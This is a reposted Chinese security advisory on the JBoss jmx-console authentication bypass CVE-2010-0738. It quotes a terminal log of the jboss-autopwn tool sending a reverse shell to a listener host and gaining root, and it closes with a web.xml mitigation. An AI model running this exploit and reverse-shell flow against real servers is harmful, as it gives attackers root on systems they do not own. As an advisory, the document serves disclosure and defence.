警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Chris said...
Got this working with JBoss-autopwn :-D
Screenshot below..
[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]#
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 修改访问配置,阻止其他的HTTP访问方式。
修改 web.xml 文件,默认位于 server/default/deploy/jmx-console.war/WEB-INF/ 目录下:
------------------------------- 8< -------------------------------
<!-- A security constraint that restricts access to the HTML JMX console
to users with the role JBossAdmin. Edit the roles to what you want and
uncomment the WEB-INF/jboss-web.xml/security-domain element to enable
secured access to the HTML JMX console.
<security-constraint>
<web-resource-collection>
<web-resource-name>HtmlAdaptor</web-resource-name>
<description>An example security config that only allows users with the
role JBossAdmin to access the HTML JMX console web application
</description>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
<http-method>HEAD</http-method> <------- 增加此行
</web-resource-collection>
<auth-constraint>
<role-name>JBossAdmin</role-name>
</auth-constraint>
</security-constraint>
-->
------------------------------- 8< -------------------------------
厂商补丁:
RedHat
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/438848,如需转载请自行联系原作者
